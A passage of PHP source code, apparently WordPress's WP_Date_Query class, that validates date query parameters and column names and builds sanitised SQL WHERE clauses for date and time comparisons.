'max' => 7, ); // Days per week. $min_max_checks['dayofweek_iso'] = array( 'min' => 1, 'max' => 7, ); // Months per year. $min_max_checks['month'] = array( 'min' => 1, 'max' => 12, ); // Weeks per year. if ( isset( $_year ) ) { /* * If we have a specific year, use it to calculate number of weeks. * Note: the number of weeks in a year is the date in which Dec 28 appears. */ $week_count = gmdate( 'W', mktime( 0, 0, 0, 12, 28, $_year ) ); } else { // Otherwise set the week-count to a maximum of 53. $week_count = 53; } $min_max_checks['week'] = array( 'min' => 1, 'max' => $week_count, ); // Days per month. $min_max_checks['day'] = array( 'min' => 1, 'max' => 31, ); // Hours per day. $min_max_checks['hour'] = array( 'min' => 0, 'max' => 23, ); // Minutes per hour. $min_max_checks['minute'] = array( 'min' => 0, 'max' => 59, ); // Seconds per minute. $min_max_checks['second'] = array( 'min' => 0, 'max' => 59, ); // Concatenate and throw a notice for each invalid value. foreach ( $min_max_checks as $key => $check ) { if ( ! array_key_exists( $key, $date_query ) ) { continue; } // Throw a notice for each failing value. foreach ( (array) $date_query[ $key ] as $_value ) { $is_between = $_value >= $check['min'] && $_value <= $check['max']; if ( ! is_numeric( $_value ) || ! $is_between ) { $error = sprintf( /* translators: Date query invalid date message. 1: Invalid value, 2: Type of value, 3: Minimum valid value, 4: Maximum valid value. */ __( 'Invalid value %1$s for %2$s. Expected value should be between %3$s and %4$s.' ), '<code>' . esc_html( $_value ) . '</code>', '<code>' . esc_html( $key ) . '</code>', '<code>' . esc_html( $check['min'] ) . '</code>', '<code>' . esc_html( $check['max'] ) . '</code>' ); _doing_it_wrong( __CLASS__, $error, '4.1.0' ); $valid = false; } } } // If we already have invalid date messages, don't bother running through checkdate(). if ( ! $valid ) { return $valid; } $day_month_year_error_msg = ''; $day_exists = array_key_exists( 'day', $date_query ) && is_numeric( $date_query['day'] ); $month_exists = array_key_exists( 'month', $date_query ) && is_numeric( $date_query['month'] ); $year_exists = array_key_exists( 'year', $date_query ) && is_numeric( $date_query['year'] ); if ( $day_exists && $month_exists && $year_exists ) { // 1. Checking day, month, year combination. if ( ! wp_checkdate( $date_query['month'], $date_query['day'], $date_query['year'], sprintf( '%s-%s-%s', $date_query['year'], $date_query['month'], $date_query['day'] ) ) ) { $day_month_year_error_msg = sprintf( /* translators: 1: Year, 2: Month, 3: Day of month. */ __( 'The following values do not describe a valid date: year %1$s, month %2$s, day %3$s.' ), '<code>' . esc_html( $date_query['year'] ) . '</code>', '<code>' . esc_html( $date_query['month'] ) . '</code>', '<code>' . esc_html( $date_query['day'] ) . '</code>' ); $valid = false; } } elseif ( $day_exists && $month_exists ) { /* * 2. checking day, month combination * We use 2012 because, as a leap year, it's the most permissive. */ if ( ! wp_checkdate( $date_query['month'], $date_query['day'], 2012, sprintf( '2012-%s-%s', $date_query['month'], $date_query['day'] ) ) ) { $day_month_year_error_msg = sprintf( /* translators: 1: Month, 2: Day of month. */ __( 'The following values do not describe a valid date: month %1$s, day %2$s.' ), '<code>' . esc_html( $date_query['month'] ) . '</code>', '<code>' . esc_html( $date_query['day'] ) . '</code>' ); $valid = false; } } if ( ! empty( $day_month_year_error_msg ) ) { _doing_it_wrong( __CLASS__, $day_month_year_error_msg, '4.1.0' ); } return $valid; } /** * Validates a column name parameter. * * Column names without a table prefix (like 'post_date') are checked against a list of * allowed and known tables, and then, if found, have a table prefix (such as 'wp_posts.') * prepended. Prefixed column names (such as 'wp_posts.post_date') bypass this allowed * check, and are only sanitized to remove illegal characters. * * @since 3.7.0 * * @param string $column The user-supplied column name. * @return string A validated column name value. */ public function validate_column( $column ) { global $wpdb; $valid_columns = array( 'post_date', 'post_date_gmt', 'post_modified', 'post_modified_gmt', 'comment_date', 'comment_date_gmt', 'user_registered', 'registered', 'last_updated', ); // Attempt to detect a table prefix. if ( false === strpos( $column, '.' ) ) { /** * Filters the list of valid date query columns. * * @since 3.7.0 * @since 4.1.0 Added 'user_registered' to the default recognized columns. * * @param string[] $valid_columns An array of valid date query columns. Defaults * are 'post_date', 'post_date_gmt', 'post_modified', * 'post_modified_gmt', 'comment_date', 'comment_date_gmt', * 'user_registered' */ if ( ! in_array( $column, apply_filters( 'date_query_valid_columns', $valid_columns ), true ) ) { $column = 'post_date'; } $known_columns = array( $wpdb->posts => array( 'post_date', 'post_date_gmt', 'post_modified', 'post_modified_gmt', ), $wpdb->comments => array( 'comment_date', 'comment_date_gmt', ), $wpdb->users => array( 'user_registered', ), $wpdb->blogs => array( 'registered', 'last_updated', ), ); // If it's a known column name, add the appropriate table prefix. foreach ( $known_columns as $table_name => $table_columns ) { if ( in_array( $column, $table_columns, true ) ) { $column = $table_name . '.' . $column; break; } } } // Remove unsafe characters. return preg_replace( '/[^a-zA-Z0-9_$\.]/', '', $column ); } /** * Generate WHERE clause to be appended to a main query. * * @since 3.7.0 * * @return string MySQL WHERE clause. */ public function get_sql() { $sql = $this->get_sql_clauses(); $where = $sql['where']; /** * Filters the date query WHERE clause. * * @since 3.7.0 * * @param string $where WHERE clause of the date query. * @param WP_Date_Query $this The WP_Date_Query instance. */ return apply_filters( 'get_date_sql', $where, $this ); } /** * Generate SQL clauses to be appended to a main query. * * Called by the public WP_Date_Query::get_sql(), this method is abstracted * out to maintain parity with the other Query classes. * * @since 4.1.0 * * @return array { * Array containing JOIN and WHERE SQL clauses to append to the main query. * * @type string $join SQL fragment to append to the main JOIN clause. * @type string $where SQL fragment to append to the main WHERE clause. * } */ protected function get_sql_clauses() { $sql = $this->get_sql_for_query( $this->queries ); if ( ! empty( $sql['where'] ) ) { $sql['where'] = ' AND ' . $sql['where']; } return $sql; } /** * Generate SQL clauses for a single query array. * * If nested subqueries are found, this method recurses the tree to * produce the properly nested SQL. * * @since 4.1.0 * * @param array $query Query to parse. * @param int $depth Optional. Number of tree levels deep we currently are. * Used to calculate indentation. Default 0. * @return array { * Array containing JOIN and WHERE SQL clauses to append to a single query array. * * @type string $join SQL fragment to append to the main JOIN clause. * @type string $where SQL fragment to append to the main WHERE clause. * } */ protected function get_sql_for_query( $query, $depth = 0 ) { $sql_chunks = array( 'join' => array(), 'where' => array(), ); $sql = array( 'join' => '', 'where' => '', ); $indent = ''; for ( $i = 0; $i < $depth; $i++ ) { $indent .= ' '; } foreach ( $query as $key => $clause ) { if ( 'relation' === $key ) { $relation = $query['relation']; } elseif ( is_array( $clause ) ) { // This is a first-order clause. if ( $this->is_first_order_clause( $clause ) ) { $clause_sql = $this->get_sql_for_clause( $clause, $query ); $where_count = count( $clause_sql['where'] ); if ( ! $where_count ) { $sql_chunks['where'][] = ''; } elseif ( 1 === $where_count ) { $sql_chunks['where'][] = $clause_sql['where'][0]; } else { $sql_chunks['where'][] = '( ' . implode( ' AND ', $clause_sql['where'] ) . ' )'; } $sql_chunks['join'] = array_merge( $sql_chunks['join'], $clause_sql['join'] ); // This is a subquery, so we recurse. } else { $clause_sql = $this->get_sql_for_query( $clause, $depth + 1 ); $sql_chunks['where'][] = $clause_sql['where']; $sql_chunks['join'][] = $clause_sql['join']; } } } // Filter to remove empties. $sql_chunks['join'] = array_filter( $sql_chunks['join'] ); $sql_chunks['where'] = array_filter( $sql_chunks['where'] ); if ( empty( $relation ) ) { $relation = 'AND'; } // Filter duplicate JOIN clauses and combine into a single string. if ( ! empty( $sql_chunks['join'] ) ) { $sql['join'] = implode( ' ', array_unique( $sql_chunks['join'] ) ); } // Generate a single WHERE clause with proper brackets and indentation. if ( ! empty( $sql_chunks['where'] ) ) { $sql['where'] = '( ' . "\n " . $indent . implode( ' ' . "\n " . $indent . $relation . ' ' . "\n " . $indent, $sql_chunks['where'] ) . "\n" . $indent . ')'; } return $sql; } /** * Turns a single date clause into pieces for a WHERE clause. * * A wrapper for get_sql_for_clause(), included here for backward * compatibility while retaining the naming convention across Query classes. * * @since 3.7.0 * * @param array $query Date query arguments. * @return array { * Array containing JOIN and WHERE SQL clauses to append to the main query. * * @type string $join SQL fragment to append to the main JOIN clause. * @type string $where SQL fragment to append to the main WHERE clause. * } */ protected function get_sql_for_subquery( $query ) { return $this->get_sql_for_clause( $query, '' ); } /** * Turns a first-order date query into SQL for a WHERE clause. * * @since 4.1.0 * * @param array $query Date query clause. * @param array $parent_query Parent query of the current date query. * @return array { * Array containing JOIN and WHERE SQL clauses to append to the main query. * * @type string $join SQL fragment to append to the main JOIN clause. * @type string $where SQL fragment to append to the main WHERE clause. * } */ protected function get_sql_for_clause( $query, $parent_query ) { global $wpdb; // The sub-parts of a $where part. $where_parts = array(); $column = ( ! empty( $query['column'] ) ) ? esc_sql( $query['column'] ) : $this->column; $column = $this->validate_column( $column ); $compare = $this->get_compare( $query ); $inclusive = ! empty( $query['inclusive'] ); // Assign greater- and less-than values. $lt = '<'; $gt = '>'; if ( $inclusive ) { $lt .= '='; $gt .= '='; } // Range queries. if ( ! empty( $query['after'] ) ) { $where_parts[] = $wpdb->prepare( "$column $gt %s", $this->build_mysql_datetime( $query['after'], ! $inclusive ) ); } if ( ! empty( $query['before'] ) ) { $where_parts[] = $wpdb->prepare( "$column $lt %s", $this->build_mysql_datetime( $query['before'], $inclusive ) ); } // Specific value queries. $date_units = array( 'YEAR' => array( 'year' ), 'MONTH' => array( 'month', 'monthnum' ), '_wp_mysql_week' => array( 'week', 'w' ), 'DAYOFYEAR' => array( 'dayofyear' ), 'DAYOFMONTH' => array( 'day' ), 'DAYOFWEEK' => array( 'dayofweek' ), 'WEEKDAY' => array( 'dayofweek_iso' ), ); // Check of the possible date units and add them to the query. foreach ( $date_units as $sql_part => $query_parts ) { foreach ( $query_parts as $query_part ) { if ( isset( $query[ $query_part ] ) ) { $value = $this->build_value( $compare, $query[ $query_part ] ); if ( $value ) { switch ( $sql_part ) { case '_wp_mysql_week': $where_parts[] = _wp_mysql_week( $column ) . " $compare $value"; break; case 'WEEKDAY': $where_parts[] = "$sql_part( $column ) + 1 $compare $value"; break; default: $where_parts[] = "$sql_part( $column ) $compare $value"; } break; } } } } if ( isset( $query['hour'] ) || isset( $query['minute'] ) || isset( $query['second'] ) ) { // Avoid notices. foreach ( array( 'hour', 'minute', 'second' ) as $unit ) { if ( ! isset( $query[ $unit ] ) ) { $query[ $unit ] = null; } } $time_query = $this->build_time_query( $column, $compare, $query['hour'], $query['minute'], $query['second'] ); if ( $time_query ) { $where_parts[] = $time_query; } } /* * Return an array of 'join' and 'where' for compatibility * with other query classes. */ return array( 'where' => $where_parts, 'join' => array(), ); } /** * Builds and validates a value string based on the comparison operator. * * @since 3.7.0 * * @param string $compare The compare operator to use. * @param string|array $value The value. * @return string|false|int The value to be used in SQL or false on error. */ public function build_value( $compare, $value ) { if ( ! isset( $value ) ) { return false; } switch ( $compare ) { case 'IN': case 'NOT IN': $value = (array) $value; // Remove non-numeric values. $value = array_filter( $value, 'is_numeric' ); if ( empty( $value ) ) { return false; } return '(' . implode( ',', array_map( 'intval', $value ) ) . ')'; case 'BETWEEN': case 'NOT BETWEEN': if ( ! is_array( $value ) || 2 !== count( $value ) ) { $value = array( $value, $value ); } else { $value = array_values( $value ); } // If either value is non-numeric, bail. foreach ( $value as $v ) { if ( ! is_numeric( $v ) ) { return false; } } $value = array_map( 'intval', $value ); return $value[0] . ' AND ' . $value[1]; default: if ( ! is_numeric( $value ) ) { return false; } return (int) $value; } } /** * Builds a MySQL format date/time based on some query parameters. * * You can pass an array of values (year, month, etc.) with missing parameter values being defaulted to * either the maximum or minimum values (controlled by the $default_to parameter). Alternatively you can * pass a string that will be passed to date_create(). * * @since 3.7.0 * * @param string|array $datetime An array of parameters or a strotime() string * @param bool $default_to_max Whether to round up incomplete dates. Supported by values * of $datetime that are arrays, or string values that are a * subset of MySQL date format ('Y', 'Y-m', 'Y-m-d', 'Y-m-d H:i'). * Default: false. * @return string|false A MySQL format date/time or false on failure */ public function build_mysql_datetime( $datetime, $default_to_max = false ) { if ( ! is_array( $datetime ) ) { /* * Try to parse some common date formats, so we can detect * the level of precision and support the 'inclusive' parameter. */ if ( preg_match( '/^(\d{4})$/', $datetime, $matches ) ) { // Y $datetime = array( 'year' => (int) $matches[1], ); } elseif ( preg_match( '/^(\d{4})\-(\d{2})$/', $datetime, $matches ) ) { // Y-m $datetime = array( 'year' => (int) $matches[1], 'month' => (int) $matches[2], ); } elseif ( preg_match( '/^(\d{4})\-(\d{2})\-(\d{2})$/', $datetime, $matches ) ) { // Y-m-d $datetime = array( 'year' => (int) $matches[1], 'month' => (int) $matches[2], 'day' => (int) $matches[3], ); } elseif ( preg_match( '/^(\d{4})\-(\d{2})\-(\d{2}) (\d{2}):(\d{2})$/', $datetime, $matches ) ) { // Y-m-d H:i $datetime = array( 'year' => (int) $matches[1], 'month' => (int) $matches[2], 'day' => (int) $matches[3], 'hour' => (int) $matches[4], 'minute' => (int) $matches[5], ); } // If no match is found, we don't support default_to_max. if ( ! is_array( $datetime ) ) { $wp_timezone = wp_timezone(); // Assume local timezone if not provided. $dt = date_create( $datetime, $wp_timezone ); if ( false === $dt ) { return gmdate( 'Y-m-d H:i:s', false ); } return $dt->setTimezone( $wp_timezone )->format( 'Y-m-d H:i:s' ); } } $datetime = array_map( 'absint', $datetime ); if ( ! isset( $datetime['year'] ) ) { $datetime['year'] = current_time( 'Y' ); } if ( ! isset( $datetime['month'] ) ) { $datetime['month'] = ( $default_to_max ) ? 12 : 1; } if ( ! isset( $datetime['day'] ) ) { $datetime['day'] = ( $default_to_max ) ? (int) gmdate( 't', mktime( 0, 0, 0, $datetime['month'], 1, $datetime['year'] ) ) : 1; } if ( ! isset( $datetime['hour'] ) ) { $datetime['hour'] = ( $default_to_max ) ? 23 : 0; } if ( ! isset( $datetime['minute'] ) ) { $datetime['minute'] = ( $default_to_max ) ? 59 : 0; } if ( ! isset( $datetime['second'] ) ) { $datetime['second'] = ( $default_to_max ) ? 59 : 0; } return sprintf( '%04d-%02d-%02d %02d:%02d:%02d', $datetime['year'], $datetime['month'], $datetime['day'], $datetime['hour'], $datetime['minute'], $datetime['second'] ); } /** * Builds a query string for comparing time values (hour, minute, second). * * If just hour, minute, or second is set than a normal comparison will be done. * However if multiple values are passed, a pseudo-decimal time will be created * in order to be able to accurately compare against. * * @since 3.7.0 * * @param string $column The column to query against. Needs to be pre-validated! * @param string $compare The comparison operator. Needs to be pre-validated! * @param int|null $hour Optional. An hour value (0-23). * @param int|null $minute Optional. A minute value (0-59). * @param int|null $second Optional. A second value (0-59). * @return string|false A query part or false on failure. */ public function build_time_query( $column, $compare, $hour = null, $minute = null, $second = null ) { global $wpdb; // Have to have at least one. if ( ! isset( $hour ) && ! isset( $minute ) && ! isset( $second ) ) { return false; } // Complex combined queries aren't supported for multi-value queries. if ( in_array( $compare, array( 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN' ), true ) ) { $return = array(); $value = $this->build_value( $compare, $hour ); if ( false !== $value ) { $return[] = "HOUR( $column ) $compare $value"; } $value = $this->build_value( $compare, $minute ); if ( false !== $value ) { $return[] = "MINUTE( $column ) $compare $value"; } $value = $this->build_value( $compare, $second ); if ( false !== $value ) { $return[] = "SECOND( $column ) $compare $value"; } return implode( ' AND ', $return ); } // Cases where just one unit is set. if ( isset( $hour ) && ! isset( $minute ) && ! isset( $second ) ) { $value = $this->build_value( $compare, $hour ); if ( false !== $value ) { return "HOUR( $column ) $compare $value"; } } elseif ( ! isset( $hour ) && isset( $minute ) && ! isset( $second ) ) { $value = $this->build_value( $compare, $minute ); if ( false !== $value ) { return "MINUTE( $column ) $compare $value"; } } elseif ( ! isset( $hour ) && ! isset( $minute ) && isset( $second ) ) { $value = $this->build_value( $compare, $second ); if ( false !== $value ) { return "SECOND( $column ) $compare $value"; } } // Single units were already handled. Since hour & second isn't allowed, minute must to be set. if ( ! isset( $minute ) ) { return false; } $format = ''; $time = ''; // Hour. if ( null !== $hour ) { $format .= '%H.'; $time .= sprintf( '%02d', $hour ) . '.'; } else { $format .= '0.'; $time .= '0.'; } // Minute. $format .= '%i'; $time .= sprintf( '%02d', $minute ); if ( isset( $second ) ) { $format .= '%s'; $time .= sprintf( '%02d', $second ); } return $wpdb->prepare( "DATE_FORMAT( $column, %s ) $compare %f", $format, $time ); } /** * Sanitizes a 'relation' operator. * * @since 6.0.3 * * @param string $relation Raw relation key from the query argument. * @return string Sanitized relation ('AND' or 'OR'). */ public function sanitize_relation( $relation ) { if ( 'OR' === strtoupper( $relation ) ) { return 'OR'; } else { return 'AND'; } } }
Close